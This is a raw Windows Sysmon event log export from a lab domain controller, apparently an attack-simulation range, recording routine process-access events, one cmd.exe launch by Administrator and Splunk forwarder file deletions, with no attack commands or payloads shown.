12:09:58.750{266CAFBE-64C5-6064-A500-00000000AE01}43566308C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011186Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.750{266CAFBE-64C5-6064-A500-00000000AE01}43566280C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011185Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.750{266CAFBE-64C5-6064-A500-00000000AE01}43566280C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011184Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.750{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011183Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.750{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011182Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.750{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011181Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.750{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011180Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.750{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011179Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.750{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6696-6064-7701-00000000AE01}6920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011178Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.750{266CAFBE-64C5-6064-A500-00000000AE01}43566332C:\Windows\Explorer.EXE{266CAFBE-6696-6064-7701-00000000AE01}6920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\windows.storage.dll+2d1a2|C:\Windows\System32\windows.storage.dll+2ce99|C:\Windows\System32\windows.storage.dll+2cd6f|C:\Windows\System32\SHELL32.dll+d6d17|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\SHELL32.dll+167aaf 154100x800000000000000011177Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.754{266CAFBE-6696-6064-7701-00000000AE01}6920C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x800000000000000011176Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.735{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011175Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.735{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011174Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.735{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+925b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+650d|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000011173Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.735{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000011172Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.735{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000011171Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.735{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011170Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.735{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000011169Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.516{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=884B8377D224264322CA77D8955B831D,SHA256=9C2C8BE34FF1AAA97BC54DC8C75613C05C640D3BCC45C24079C3AE64E91013F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011168Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.094{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7BEF1CF0C24412ECA7F34FF0ACF920B,SHA256=C08769F480FFE82EE0794CEC16B834E69B79C7047D9BED456F386D5A90C2E68F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011167Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.047{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011166Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.047{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011165Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.047{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011164Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:58.047{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011163Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 